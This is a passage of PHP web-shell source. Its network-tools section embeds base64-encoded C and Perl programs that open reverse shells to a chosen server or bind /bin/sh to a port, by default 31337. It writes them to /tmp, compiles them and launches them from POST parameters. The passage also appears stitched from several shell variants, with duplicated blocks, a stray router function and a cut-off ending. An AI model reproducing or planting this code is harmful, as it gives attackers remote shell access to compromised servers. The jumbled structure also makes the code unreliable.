@unlink("/tmp/bp.c");
$out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
}
if($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl",$bind_port_p);
$out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
}
if($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c",$back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
}
}
echo '</div>';
}
/**
* reroute to 404
**/
function route404()
{
include $this->arriveAtDestination(cf('router', 'destinations'), array('destination' => $this->parseDestination(cf('router', '404'))));
$this->curentRoute = array('destination' => $this->parseDestination(cf('router', '404')), 'parameters' => array('ref' => '404'));
exit;
}
function actionNetwork()
{
hardHeader();
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>\n\t<span>Bind port to /bin/sh</span><br/>\n\tPort: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\n\t<span>Back-connect to</span><br/>\n\tServer: <input type='text' name='server' value=" . $_SERVER['REMOTE_ADDR'] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c", $bind_port_c);
$▖ = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$▖ .= ex("/tmp/bp " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp") . "</pre>";
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$▖ = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp.pl") . "</pre>";
}
if ($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c", $back_connect_c);
$▖ = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$▖ .= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc") . "</pre>";
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$▖ = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc.pl") . "</pre>";
}
}
echo '</div>';
hardFooter();
}
p('Your IP:');
makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
p('Your Port:');
makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
p('Use:');
makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
p('</p>');
formfoot();
} elseif ($action == 'bindport') {
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
if (!isset($bindport) || $bindport == null) {
$bindport = "31337";
}
if (isset($startbind) && isset($bindport) && $bindport != null && $startbind != null) {
cf("/tmp/bp.pl", $bind_port_p);
$out = wsoEx("perl /tmp/bp.pl " . $bindport . " 1>/dev/null 2>&1 &");
$out2 = wsoEx("ps aux | grep bp.pl");
unlink("/tmp/bp.pl");
m("Now script binded to port " . $bindport . "...");
}
formhead(array('title' => 'Bind Port'));
makehide('action', 'bindport');
p('<p>');
p('Port:');
makeinput(array('name' => 'bindport', 'size' => 15, 'value' => $bindport));
makeinput(array('name' => 'startbind', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
p('</p>');
formfoot();
} elseif ($action == 'portscan') {
!$scanip && ($scanip = '127.0.0.1');
